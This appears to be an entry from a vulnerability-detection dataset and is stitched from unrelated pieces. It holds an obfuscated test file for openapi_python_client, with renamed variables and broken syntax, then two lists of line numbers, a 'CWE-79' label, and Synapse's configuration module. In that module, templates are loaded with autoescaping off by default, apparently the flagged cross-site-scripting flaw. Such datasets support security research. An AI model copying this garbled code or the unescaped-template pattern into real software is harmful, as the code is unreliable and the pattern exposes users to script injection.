VAR_14 = VAR_1.patch(f"{VAR_0}.property_from_data")
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_request_json_body(VAR_25)
VAR_14.assert_called_once_with("json_body", required=True, VAR_39=VAR_26)
assert VAR_16 == VAR_14()
def FUNC_12(self):
VAR_25 = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
VAR_16 = Endpoint.parse_request_json_body(VAR_25)
assert VAR_16 is None
def FUNC_13(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_27 = VAR_1.patch.object(Endpoint, "parse_request_form_body")
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
Endpoint._add_body(VAR_28, oai.Operation.construct())
VAR_27.assert_not_called()
def FUNC_14(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_1.patch.object(Endpoint, "parse_request_form_body")
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_1.patch.object(Endpoint, "parse_request_json_body", return_value=VAR_17)
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
VAR_29 = VAR_1.MagicMock()
VAR_16 = Endpoint._add_body(VAR_28, oai.Operation.construct(requestBody=VAR_29))
assert VAR_16 == ParseError(detail=f"cannot parse VAR_25 of VAR_28 {endpoint.name}", VAR_39=VAR_17.data)
def FUNC_15(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint, Reference
from openapi_python_client.parser.properties import Property
VAR_29 = VAR_1.MagicMock()
VAR_30 = Reference.from_ref(VAR_24="a")
VAR_31 = Reference.from_ref(VAR_24="b")
VAR_27 = VAR_1.patch.object(
Endpoint, "parse_request_form_body", return_value=VAR_30
)
VAR_32 = VAR_1.patch.object(
Endpoint, "parse_multipart_body", return_value=VAR_31
)
VAR_33 = VAR_1.MagicMock(autospec=Property)
VAR_34 = VAR_1.MagicMock()
VAR_33.get_imports.return_value = {VAR_34}
VAR_35 = VAR_1.patch.object(Endpoint, "parse_request_json_body", return_value=VAR_33)
VAR_36 = VAR_1.patch(
f"{VAR_0}.import_string_from_reference", side_effect=["import_1", "import_2"]
)
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
VAR_28 = Endpoint._add_body(VAR_28, oai.Operation.construct(requestBody=VAR_29))
VAR_27.assert_called_once_with(VAR_29)
VAR_35.assert_called_once_with(VAR_29)
VAR_32.assert_called_once_with(VAR_29)
VAR_36.assert_has_calls(
[
VAR_1.call(VAR_30, VAR_62="..models"),
VAR_1.call(VAR_31, VAR_62="..models"),
]
)
VAR_33.get_imports.assert_called_once_with(VAR_62="..models")
assert VAR_28.relative_imports == {"import_1", "import_2", "import_3", VAR_34}
assert VAR_28.json_body == VAR_33
assert VAR_28.form_body_reference == VAR_30
assert VAR_28.multipart_body_reference == VAR_31
def FUNC_16(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_37 = VAR_1.MagicMock()
VAR_38 = VAR_1.MagicMock()
VAR_39 = {
"200": VAR_37,
"404": VAR_38,
}
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_40 = VAR_1.patch(f"{VAR_0}.response_from_data", return_value=VAR_17)
VAR_41 = Endpoint._add_responses(VAR_28, VAR_39)
VAR_40.assert_called_once_with(status_code=200, VAR_39=VAR_37)
assert VAR_41 == ParseError(
detail=f"cannot parse VAR_41 of VAR_28 {endpoint.name}", VAR_39=VAR_17.data
)
def FUNC_17(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint, Reference, RefResponse
VAR_37 = VAR_1.MagicMock()
VAR_38 = VAR_1.MagicMock()
VAR_39 = {
"200": VAR_37,
"404": VAR_38,
}
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
VAR_42 = Reference.from_ref(VAR_24="ref_1")
VAR_43 = Reference.from_ref(VAR_24="ref_2")
VAR_44 = RefResponse(status_code=200, VAR_61=VAR_42)
VAR_45 = RefResponse(status_code=404, VAR_61=VAR_43)
VAR_40 = VAR_1.patch(f"{VAR_0}.response_from_data", side_effect=[VAR_44, VAR_45])
VAR_36 = VAR_1.patch(
f"{VAR_0}.import_string_from_reference", side_effect=["import_1", "import_2"]
)
VAR_28 = Endpoint._add_responses(VAR_28, VAR_39)
VAR_40.assert_has_calls(
[VAR_1.call(status_code=200, VAR_39=VAR_37), VAR_1.call(status_code=404, VAR_39=VAR_38),]
)
VAR_36.assert_has_calls(
[VAR_1.call(VAR_42, VAR_62="..models"), VAR_1.call(VAR_43, VAR_62="..models"),]
)
assert VAR_28.responses == [VAR_44, VAR_45]
assert VAR_28.relative_imports == {"import_1", "import_2", "import_3"}
def FUNC_18(self):
from openapi_python_client.parser.openapi import Endpoint
VAR_28 = Endpoint(
VAR_56="path", VAR_57="method", description=None, name="name", requires_security=False, tag="tag",
)
assert Endpoint._add_parameters(VAR_28, oai.Operation.construct()) == VAR_28
def FUNC_19(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_28 = Endpoint(
VAR_56="path", VAR_57="method", description=None, name="name", requires_security=False, tag="tag",
)
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_1.patch(f"{VAR_0}.property_from_data", return_value=VAR_17)
VAR_46 = oai.Parameter.construct(name="test", required=True, param_schema=VAR_1.MagicMock(), param_in="cookie")
VAR_16 = Endpoint._add_parameters(VAR_28, oai.Operation.construct(parameters=[VAR_46]))
assert VAR_16 == ParseError(VAR_39=VAR_17.data, detail=f"cannot parse parameter of VAR_28 {endpoint.name}")
def FUNC_20(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_28 = Endpoint(
VAR_56="path", VAR_57="method", description=None, name="name", requires_security=False, tag="tag",
)
VAR_1.patch(f"{VAR_0}.property_from_data")
VAR_46 = oai.Parameter.construct(name="test", required=True, param_schema=VAR_1.MagicMock(), param_in="cookie")
VAR_16 = Endpoint._add_parameters(VAR_28, oai.Operation.construct(parameters=[VAR_46]))
assert VAR_16 == ParseError(VAR_39=VAR_46, detail="Parameter must be declared in VAR_56 or query")
def FUNC_21(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
from openapi_python_client.parser.properties import Property
VAR_28 = Endpoint(
VAR_56="path",
VAR_57="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
VAR_47 = VAR_1.MagicMock(autospec=Property)
VAR_48 = VAR_1.MagicMock()
VAR_47.get_imports = VAR_1.MagicMock(return_value={VAR_48})
VAR_49 = VAR_1.MagicMock(autospec=Property)
VAR_50 = VAR_1.MagicMock()
VAR_49.get_imports = VAR_1.MagicMock(return_value={VAR_50})
VAR_51 = VAR_1.MagicMock(autospec=Property)
VAR_52 = VAR_1.MagicMock()
VAR_51.get_imports = VAR_1.MagicMock(return_value={VAR_52})
VAR_14 = VAR_1.patch(
f"{VAR_0}.property_from_data", side_effect=[VAR_47, VAR_49, VAR_51]
)
VAR_53 = VAR_1.MagicMock()
VAR_54 = VAR_1.MagicMock()
VAR_55 = VAR_1.MagicMock()
VAR_39 = oai.Operation.construct(
parameters=[
oai.Parameter.construct(
name="path_prop_name", required=True, param_schema=VAR_53, param_in="path"
),
oai.Parameter.construct(
name="query_prop_name", required=False, param_schema=VAR_54, param_in="query"
),
oai.Parameter.construct(
name="header_prop_name", required=False, param_schema=VAR_55, param_in="header"
),
oai.Reference.construct(), # Should be ignored
oai.Parameter.construct(), # Should be ignored
]
)
VAR_28 = Endpoint._add_parameters(VAR_28, VAR_39)
VAR_14.assert_has_calls(
[
VAR_1.call(name="path_prop_name", required=True, VAR_39=VAR_53),
VAR_1.call(name="query_prop_name", required=False, VAR_39=VAR_54),
VAR_1.call(name="header_prop_name", required=False, VAR_39=VAR_55),
]
)
VAR_47.get_imports.assert_called_once_with(VAR_62="..models")
VAR_49.get_imports.assert_called_once_with(VAR_62="..models")
VAR_51.get_imports.assert_called_once_with(VAR_62="..models")
assert VAR_28.relative_imports == {"import_3", VAR_48, VAR_50, VAR_52}
assert VAR_28.path_parameters == [VAR_47]
assert VAR_28.query_parameters == [VAR_49]
assert VAR_28.header_parameters == [VAR_51]
def FUNC_22(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_56 = VAR_1.MagicMock()
VAR_57 = VAR_1.MagicMock()
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_58 = VAR_1.patch.object(Endpoint, "_add_parameters", return_value=VAR_17)
VAR_39 = oai.Operation.construct(
description=VAR_1.MagicMock(),
operationId=VAR_1.MagicMock(),
security={"blah": "bloo"},
responses=VAR_1.MagicMock(),
)
VAR_16 = Endpoint.from_data(VAR_39=data, VAR_56=path, VAR_57=method, tag="default")
assert VAR_16 == VAR_17
def FUNC_23(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_56 = VAR_1.MagicMock()
VAR_57 = VAR_1.MagicMock()
VAR_17 = ParseError(VAR_39=VAR_1.MagicMock())
VAR_58 = VAR_1.patch.object(Endpoint, "_add_parameters")
VAR_59 = VAR_1.patch.object(Endpoint, "_add_responses", return_value=VAR_17)
VAR_39 = oai.Operation.construct(
description=VAR_1.MagicMock(),
operationId=VAR_1.MagicMock(),
security={"blah": "bloo"},
responses=VAR_1.MagicMock(),
)
VAR_16 = Endpoint.from_data(VAR_39=data, VAR_56=path, VAR_57=method, tag="default")
assert VAR_16 == VAR_17
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint
VAR_56 = VAR_1.MagicMock()
VAR_57 = VAR_1.MagicMock()
VAR_58 = VAR_1.patch.object(Endpoint, "_add_parameters")
VAR_59 = VAR_1.patch.object(Endpoint, "_add_responses")
VAR_60 = VAR_1.patch.object(Endpoint, "_add_body")
VAR_39 = oai.Operation.construct(
description=VAR_1.MagicMock(),
operationId=VAR_1.MagicMock(),
security={"blah": "bloo"},
responses=VAR_1.MagicMock(),
)
VAR_1.patch("openapi_python_client.utils.remove_string_escapes", return_value=VAR_39.description)
VAR_28 = Endpoint.from_data(VAR_39=data, VAR_56=path, VAR_57=method, tag="default")
assert VAR_28 == VAR_60.return_value
VAR_58.assert_called_once_with(
Endpoint(
VAR_56=path,
VAR_57=method,
description=VAR_39.description,
name=VAR_39.operationId,
requires_security=True,
tag="default",
),
VAR_39,
)
VAR_59.assert_called_once_with(VAR_58.return_value, VAR_39.responses)
VAR_60.assert_called_once_with(VAR_59.return_value, VAR_39)
data.security = None
VAR_58.reset_mock()
Endpoint.from_data(VAR_39=data, VAR_56=path, VAR_57=method, tag="a")
VAR_58.assert_called_once_with(
Endpoint(
VAR_56=path,
VAR_57=method,
description=VAR_39.description,
name=VAR_39.operationId,
requires_security=False,
tag="a",
),
VAR_39,
)
data.operationId = None
assert Endpoint.from_data(VAR_39=data, VAR_56=path, VAR_57=method, tag="a") == ParseError(
VAR_39=data, detail="Path operations with operationId are not yet supported"
)
class CLASS_4:
def FUNC_24(self, VAR_1):
from openapi_python_client.parser.openapi import .import_string_from_reference
from openapi_python_client.parser.reference import Reference
VAR_61 = VAR_1.MagicMock(autospec=Reference)
VAR_16 = VAR_36(VAR_61)
assert VAR_16 == f"from .{VAR_61.module_name} import {VAR_61.class_name}"
def FUNC_25(self, VAR_1):
from openapi_python_client.parser.openapi import .import_string_from_reference
from openapi_python_client.parser.reference import Reference
VAR_62 = VAR_1.MagicMock(autospec=str)
VAR_61 = VAR_1.MagicMock(autospec=Reference)
VAR_16 = VAR_36(VAR_61=reference, VAR_62=prefix)
assert VAR_16 == f"from {VAR_62}.{VAR_61.module_name} import {VAR_61.class_name}"
class CLASS_5:
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint, VAR_3
VAR_63 = oai.Operation.construct()
VAR_64 = oai.Operation.construct(tags=["tag_2", "tag_3"])
VAR_65 = oai.Operation.construct()
VAR_39 = {
"path_1": oai.PathItem.construct(post=VAR_64, put=VAR_63),
"path_2": oai.PathItem.construct(get=VAR_65),
}
VAR_66 = VAR_1.MagicMock(autospec=Endpoint, tag="default", relative_imports={"1", "2"})
VAR_67 = VAR_1.MagicMock(autospec=Endpoint, tag="tag_2", relative_imports={"2"})
VAR_68 = VAR_1.MagicMock(autospec=Endpoint, tag="default", relative_imports={"2", "3"})
VAR_69 = VAR_1.patch.object(
Endpoint, "from_data", side_effect=[VAR_66, VAR_67, VAR_68]
)
VAR_16 = VAR_3.from_data(VAR_39=data)
VAR_69.assert_has_calls(
[
VAR_1.call(VAR_39=VAR_63, VAR_56="path_1", VAR_57="put", tag="default"),
VAR_1.call(VAR_39=VAR_64, VAR_56="path_1", VAR_57="post", tag="tag_2"),
VAR_1.call(VAR_39=VAR_65, VAR_56="path_2", VAR_57="get", tag="default"),
],
)
assert VAR_16 == {
"default": VAR_3(
"default", endpoints=[VAR_66, VAR_68], relative_imports={"1", "2", "3"}
),
"tag_2": VAR_3("tag_2", endpoints=[VAR_67], relative_imports={"2"}),
}
def FUNC_26(self, VAR_1):
from openapi_python_client.parser.openapi import Endpoint, VAR_3, ParseError
VAR_63 = oai.Operation.construct()
VAR_64 = oai.Operation.construct(tags=["tag_2", "tag_3"])
VAR_65 = oai.Operation.construct()
VAR_39 = {
"path_1": oai.PathItem.construct(post=VAR_64, put=VAR_63),
"path_2": oai.PathItem.construct(get=VAR_65),
}
VAR_69 = VAR_1.patch.object(
Endpoint, "from_data", side_effect=[ParseError(VAR_39="1"), ParseError(VAR_39="2"), ParseError(VAR_39="3")]
)
VAR_16 = VAR_3.from_data(VAR_39=data)
VAR_69.assert_has_calls(
[
VAR_1.call(VAR_39=VAR_63, VAR_56="path_1", VAR_57="put", tag="default"),
VAR_1.call(VAR_39=VAR_64, VAR_56="path_1", VAR_57="post", tag="tag_2"),
VAR_1.call(VAR_39=VAR_65, VAR_56="path_2", VAR_57="get", tag="default"),
],
)
assert VAR_16["default"].parse_errors[0].data == "1"
assert VAR_16["default"].parse_errors[1].data == "3"
assert VAR_16["tag_2"].parse_errors[0].data == "2"
| [
3,
7,
9,
10,
17,
20,
22,
24,
37,
38,
41,
43,
46,
49,
51,
53,
55,
68,
69,
73,
90,
92,
94,
111,
122,
124,
126,
131,
133,
134,
143,
145,
147,
152,
155,
160,
163,
167,
169,
172,
173,
185,
187,
189,
192,
195,
197,
199,
201,
208,
210,
212,
215,
218,
220,
222,
224,
231,
233,
235,
238,
241,
243,
245,
247,
250,
261,
263,
265,
268,
282,
284,
286,
290,
300,
308,
318,
320,
335,
338,
356,
358,
363,
366,
390,
392,
401,
404,
408,
410,
413,
420,
423,
426,
432,
435,
439,
479,
481,
496,
499,
510,
512,
514,
517,
529,
531,
533,
536,
548,
550,
552,
566,
569,
571,
583,
588,
589,
594,
597,
599,
603,
607,
609,
610,
614,
628,
630,
644,
647,
658,
660,
671
] | [
3,
7,
9,
10,
17,
20,
22,
24,
37,
38,
41,
43,
46,
49,
51,
53,
55,
68,
69,
73,
90,
92,
94,
111,
122,
124,
126,
131,
133,
134,
143,
145,
147,
152,
155,
160,
163,
167,
169,
172,
173,
185,
187,
189,
192,
195,
197,
199,
201,
208,
210,
212,
215,
218,
220,
222,
224,
231,
233,
235,
238,
241,
243,
245,
247,
250,
261,
263,
265,
268,
282,
284,
286,
290,
300,
308,
318,
320,
335,
338,
356,
358,
363,
366,
390,
392,
401,
404,
408,
410,
413,
420,
423,
426,
432,
435,
439,
479,
481,
496,
499,
510,
512,
514,
517,
529,
531,
533,
536,
548,
550,
552,
554,
568,
571,
573,
585,
590,
591,
596,
599,
601,
605,
609,
611,
612,
616,
630,
632,
646,
649,
660,
662,
673
] |
1CWE-79
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2017-2018 New Vector Ltd
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import errno
import os
import time
import urllib.parse
from collections import OrderedDict
from hashlib import sha256
from textwrap import dedent
from typing import Any, Callable, Iterable, List, MutableMapping, Optional
import attr
import jinja2
import pkg_resources
import yaml
class ConfigError(Exception):
"""Represents a problem parsing the configuration
Args:
msg: A textual description of the error.
path: Where appropriate, an indication of where in the configuration
the problem lies.
"""
def __init__(self, msg: str, path: Optional[Iterable[str]] = None):
self.msg = msg
self.path = path
# We split these messages out to allow packages to override with package
# specific instructions.
MISSING_REPORT_STATS_CONFIG_INSTRUCTIONS = """\
Please opt in or out of reporting anonymized homeserver usage statistics, by
setting the `report_stats` key in your config file to either True or False.
"""
MISSING_REPORT_STATS_SPIEL = """\
We would really appreciate it if you could help our project out by reporting
anonymized usage statistics from your homeserver. Only very basic aggregate
data (e.g. number of users) will be reported, but it helps us to track the
growth of the Matrix community, and helps us to make Matrix a success, as well
as to convince other networks that they should peer with us.
Thank you.
"""
MISSING_SERVER_NAME = """\
Missing mandatory `server_name` config option.
"""
CONFIG_FILE_HEADER = """\
# Configuration file for Synapse.
#
# This is a YAML file: see [1] for a quick introduction. Note in particular
# that *indentation is important*: all the elements of a list or dictionary
# should have the same indentation.
#
# [1] https://docs.ansible.com/ansible/latest/reference_appendices/YAMLSyntax.html
"""
def path_exists(file_path):
"""Check if a file exists
Unlike os.path.exists, this throws an exception if there is an error
checking if the file exists (for example, if there is a perms error on
the parent dir).
Returns:
bool: True if the file exists; False if not.
"""
try:
os.stat(file_path)
return True
except OSError as e:
if e.errno != errno.ENOENT:
raise e
return False
class Config:
"""
A configuration section, containing configuration keys and values.
Attributes:
section (str): The section title of this config object, such as
"tls" or "logger". This is used to refer to it on the root
logger (for example, `config.tls.some_option`). Must be
defined in subclasses.
"""
section = None
def __init__(self, root_config=None):
self.root = root_config
# Get the path to the default Synapse template directory
self.default_template_dir = pkg_resources.resource_filename(
"synapse", "res/templates"
)
def __getattr__(self, item: str) -> Any:
"""
Try and fetch a configuration option that does not exist on this class.
This is so that existing configs that rely on `self.value`, where value
is actually from a different config section, continue to work.
"""
if item in ["generate_config_section", "read_config"]:
raise AttributeError(item)
if self.root is None:
raise AttributeError(item)
else:
return self.root._get_unclassed_config(self.section, item)
@staticmethod
def parse_size(value):
if isinstance(value, int):
return value
sizes = {"K": 1024, "M": 1024 * 1024}
size = 1
suffix = value[-1]
if suffix in sizes:
value = value[:-1]
size = sizes[suffix]
return int(value) * size
@staticmethod
def parse_duration(value):
if isinstance(value, int):
return value
second = 1000
minute = 60 * second
hour = 60 * minute
day = 24 * hour
week = 7 * day
year = 365 * day
sizes = {"s": second, "m": minute, "h": hour, "d": day, "w": week, "y": year}
size = 1
suffix = value[-1]
if suffix in sizes:
value = value[:-1]
size = sizes[suffix]
return int(value) * size
@staticmethod
def abspath(file_path):
return os.path.abspath(file_path) if file_path else file_path
@classmethod
def path_exists(cls, file_path):
return path_exists(file_path)
@classmethod
def check_file(cls, file_path, config_name):
if file_path is None:
raise ConfigError("Missing config for %s." % (config_name,))
try:
os.stat(file_path)
except OSError as e:
raise ConfigError(
"Error accessing file '%s' (config for %s): %s"
% (file_path, config_name, e.strerror)
)
return cls.abspath(file_path)
@classmethod
def ensure_directory(cls, dir_path):
dir_path = cls.abspath(dir_path)
try:
os.makedirs(dir_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
if not os.path.isdir(dir_path):
raise ConfigError("%s is not a directory" % (dir_path,))
return dir_path
@classmethod
def read_file(cls, file_path, config_name):
cls.check_file(file_path, config_name)
with open(file_path) as file_stream:
return file_stream.read()
def read_templates(
self,
filenames: List[str],
custom_template_directory: Optional[str] = None,
autoescape: bool = False,
) -> List[jinja2.Template]:
"""Load a list of template files from disk using the given variables.
This function will attempt to load the given templates from the default Synapse
template directory. If `custom_template_directory` is supplied, that directory
is tried first.
Files read are treated as Jinja templates. These templates are not rendered yet.
Args:
filenames: A list of template filenames to read.
custom_template_directory: A directory to try to look for the templates
before using the default Synapse template directory instead.
autoescape: Whether to autoescape variables before inserting them into the
template.
Raises:
ConfigError: if the file's path is incorrect or otherwise cannot be read.
Returns:
A list of jinja2 templates.
"""
templates = []
search_directories = [self.default_template_dir]
# The loader will first look in the custom template directory (if specified) for the
# given filename. If it doesn't find it, it will use the default template dir instead
if custom_template_directory:
# Check that the given template directory exists
if not self.path_exists(custom_template_directory):
raise ConfigError(
"Configured template directory does not exist: %s"
% (custom_template_directory,)
)
# Search the custom template directory as well
search_directories.insert(0, custom_template_directory)
loader = jinja2.FileSystemLoader(search_directories)
env = jinja2.Environment(loader=loader, autoescape=autoescape)
# Update the environment with our custom filters
env.filters.update(
{
"format_ts": _format_ts_filter,
"mxc_to_http": _create_mxc_to_http_filter(self.public_baseurl),
}
)
for filename in filenames:
# Load the template
template = env.get_template(filename)
templates.append(template)
return templates
def _format_ts_filter(value: int, format: str):
return time.strftime(format, time.localtime(value / 1000))
def _create_mxc_to_http_filter(public_baseurl: str) -> Callable:
"""Create and return a jinja2 filter that converts MXC urls to HTTP
Args:
public_baseurl: The public, accessible base URL of the homeserver
"""
def mxc_to_http_filter(value, width, height, resize_method="crop"):
if value[0:6] != "mxc://":
return ""
server_and_media_id = value[6:]
fragment = None
if "#" in server_and_media_id:
server_and_media_id, fragment = server_and_media_id.split("#", 1)
fragment = "#" + fragment
params = {"width": width, "height": height, "method": resize_method}
return "%s_matrix/media/v1/thumbnail/%s?%s%s" % (
public_baseurl,
server_and_media_id,
urllib.parse.urlencode(params),
fragment or "",
)
return mxc_to_http_filter
class RootConfig:
"""
Holder of an application's configuration.
What configuration this object holds is defined by `config_classes`, a list
of Config classes that will be instantiated and given the contents of a
configuration file to read. They can then be accessed on this class by their
section name, defined in the Config or dynamically set to be the name of the
class, lower-cased and with "Config" removed.
"""
config_classes = []
def __init__(self):
self._configs = OrderedDict()
for config_class in self.config_classes:
if config_class.section is None:
raise ValueError("%r requires a section name" % (config_class,))
try:
conf = config_class(self)
except Exception as e:
raise Exception("Failed making %s: %r" % (config_class.section, e))
self._configs[config_class.section] = conf
def __getattr__(self, item: str) -> Any:
"""
Redirect lookups on this object either to config objects, or values on
config objects, so that `config.tls.blah` works, as well as legacy uses
of things like `config.server_name`. It will first look up the config
section name, and then values on those config classes.
"""
if item in self._configs.keys():
return self._configs[item]
return self._get_unclassed_config(None, item)
def _get_unclassed_config(self, asking_section: Optional[str], item: str):
"""
Fetch a config value from one of the instantiated config classes that
has not been fetched directly.
Args:
asking_section: If this check is coming from a Config child, which
one? This section will not be asked if it has the value.
item: The configuration value key.
Raises:
AttributeError if no config classes have the config key. The body
will contain what sections were checked.
"""
for key, val in self._configs.items():
if key == asking_section:
continue
if item in dir(val):
return getattr(val, item)
raise AttributeError(item, "not found in %s" % (list(self._configs.keys()),))
def invoke_all(self, func_name: str, *args, **kwargs) -> MutableMapping[str, Any]:
"""
Invoke a function on all instantiated config objects this RootConfig is
configured to use.
Args:
func_name: Name of function to invoke
*args
**kwargs
Returns:
ordered dictionary of config section name and the result of the
function from it.
"""
res = OrderedDict()
for name, config in self._configs.items():
if hasattr(config, func_name):
res[name] = getattr(config, func_name)(*args, **kwargs)
return res
@classmethod
def invoke_all_static(cls, func_name: str, *args, **kwargs):
"""
Invoke a static function on config objects this RootConfig is
configured to use.
Args:
func_name: Name of function to invoke
*args
**kwargs
Returns:
ordered dictionary of config section name and the result of the
function from it.
"""
for config in cls.config_classes:
if hasattr(config, func_name):
getattr(config, func_name)(*args, **kwargs)
def generate_config(
self,
config_dir_path,
data_dir_path,
server_name,
generate_secrets=False,
report_stats=None,
open_private_ports=False,
listeners=None,
tls_certificate_path=None,
tls_private_key_path=None,
acme_domain=None,
):
"""
Build a default configuration file
This is used when the user explicitly asks us to generate a config file
(eg with --generate_config).
Args:
config_dir_path (str): The path where the config files are kept. Used to
create filenames for things like the log config and the signing key.
data_dir_path (str): The path where the data files are kept. Used to create
filenames for things like the database and media store.
server_name (str): The server name. Used to initialise the server_name
config param, but also used in the names of some of the config files.
generate_secrets (bool): True if we should generate new secrets for things
like the macaroon_secret_key. If False, these parameters will be left
unset.
report_stats (bool|None): Initial setting for the report_stats setting.
If None, report_stats will be left unset.
open_private_ports (bool): True to leave private ports (such as the non-TLS
HTTP listener) open to the internet.
listeners (list(dict)|None): A list of descriptions of the listeners
synapse should start with each of which specifies a port (str), a list of
resources (list(str)), tls (bool) and type (str). For example:
[{
"port": 8448,
"resources": [{"names": ["federation"]}],
"tls": True,
"type": "http",
},
{
"port": 443,
"resources": [{"names": ["client"]}],
"tls": False,
"type": "http",
}],
database (str|None): The database type to configure, either `psycog2`
or `sqlite3`.
tls_certificate_path (str|None): The path to the tls certificate.
tls_private_key_path (str|None): The path to the tls private key.
acme_domain (str|None): The domain acme will try to validate. If
specified acme will be enabled.
Returns:
str: the yaml config file
"""
return CONFIG_FILE_HEADER + "\n\n".join(
dedent(conf)
for conf in self.invoke_all(
"generate_config_section",
config_dir_path=config_dir_path,
data_dir_path=data_dir_path,
server_name=server_name,
generate_secrets=generate_secrets,
report_stats=report_stats,
open_private_ports=open_private_ports,
listeners=listeners,
tls_certificate_path=tls_certificate_path,
tls_private_key_path=tls_private_key_path,
acme_domain=acme_domain,
).values()
)
@classmethod
def load_config(cls, description, argv):
"""Parse the commandline and config files
Doesn't support config-file-generation: used by the worker apps.
Returns: Config object.
"""
config_parser = argparse.ArgumentParser(description=description)
cls.add_arguments_to_parser(config_parser)
obj, _ = cls.load_config_with_parser(config_parser, argv)
return obj
@classmethod
def add_arguments_to_parser(cls, config_parser):
"""Adds all the config flags to an ArgumentParser.
Doesn't support config-file-generation: used by the worker apps.
Used for workers where we want to add extra flags/subcommands.
Args:
config_parser (ArgumentParser): App description
"""
config_parser.add_argument(
"-c",
"--config-path",
action="append",
metavar="CONFIG_FILE",
help="Specify config file. Can be given multiple times and"
" may specify directories containing *.yaml files.",
)
config_parser.add_argument(
"--keys-directory",
metavar="DIRECTORY",
help="Where files such as certs and signing keys are stored when"
" their location is not given explicitly in the config."
" Defaults to the directory containing the last config file",
)
cls.invoke_all_static("add_arguments", config_parser)
@classmethod
def load_config_with_parser(cls, parser, argv):
"""Parse the commandline and config files with the given parser
Doesn't support config-file-generation: used by the worker apps.
Used for workers where we want to add extra flags/subcommands.
Args:
parser (ArgumentParser)
argv (list[str])
Returns:
tuple[HomeServerConfig, argparse.Namespace]: Returns the parsed
config object and the parsed argparse.Namespace object from
`parser.parse_args(..)`
"""
obj = cls()
config_args = parser.parse_args(argv)
config_files = find_config_files(search_paths=config_args.config_path)
if not config_files:
parser.error("Must supply a config file.")
if config_args.keys_directory:
config_dir_path = config_args.keys_directory
else:
config_dir_path = os.path.dirname(config_files[-1])
config_dir_path = os.path.abspath(config_dir_path)
data_dir_path = os.getcwd()
config_dict = read_config_files(config_files)
obj.parse_config_dict(
config_dict, config_dir_path=config_dir_path, data_dir_path=data_dir_path
)
obj.invoke_all("read_arguments", config_args)
return obj, config_args
@classmethod
def load_or_generate_config(cls, description, argv):
"""Parse the commandline and config files
Supports generation of config files, so is used for the main homeserver app.
Returns: Config object, or None if --generate-config or --generate-keys was set
"""
parser = argparse.ArgumentParser(description=description)
parser.add_argument(
"-c",
"--config-path",
action="append",
metavar="CONFIG_FILE",
help="Specify config file. Can be given multiple times and"
" may specify directories containing *.yaml files.",
)
generate_group = parser.add_argument_group("Config generation")
generate_group.add_argument(
"--generate-config",
action="store_true",
help="Generate a config file, then exit.",
)
generate_group.add_argument(
"--generate-missing-configs",
"--generate-keys",
action="store_true",
help="Generate any missing additional config files, then exit.",
)
generate_group.add_argument(
"-H", "--server-name", help="The server name to generate a config file for."
)
generate_group.add_argument(
"--report-stats",
action="store",
help="Whether the generated config reports anonymized usage statistics.",
choices=["yes", "no"],
)
generate_group.add_argument(
"--config-directory",
"--keys-directory",
metavar="DIRECTORY",
help=(
"Specify where additional config files such as signing keys and log"
" config should be stored. Defaults to the same directory as the last"
" config file."
),
)
generate_group.add_argument(
"--data-directory",
metavar="DIRECTORY",
help=(
"Specify where data such as the media store and database file should be"
" stored. Defaults to the current working directory."
),
)
generate_group.add_argument(
"--open-private-ports",
action="store_true",
help=(
"Leave private ports (such as the non-TLS HTTP listener) open to the"
" internet. Do not use this unless you know what you are doing."
),
)
cls.invoke_all_static("add_arguments", parser)
config_args = parser.parse_args(argv)
config_files = find_config_files(search_paths=config_args.config_path)
if not config_files:
parser.error(
"Must supply a config file.\nA config file can be automatically"
' generated using "--generate-config -H SERVER_NAME'
' -c CONFIG-FILE"'
)
if config_args.config_directory:
config_dir_path = config_args.config_directory
else:
config_dir_path = os.path.dirname(config_files[-1])
config_dir_path = os.path.abspath(config_dir_path)
data_dir_path = os.getcwd()
generate_missing_configs = config_args.generate_missing_configs
obj = cls()
if config_args.generate_config:
if config_args.report_stats is None:
parser.error(
"Please specify either --report-stats=yes or --report-stats=no\n\n"
+ MISSING_REPORT_STATS_SPIEL
)
(config_path,) = config_files
if not path_exists(config_path):
print("Generating config file %s" % (config_path,))
if config_args.data_directory:
data_dir_path = config_args.data_directory
else:
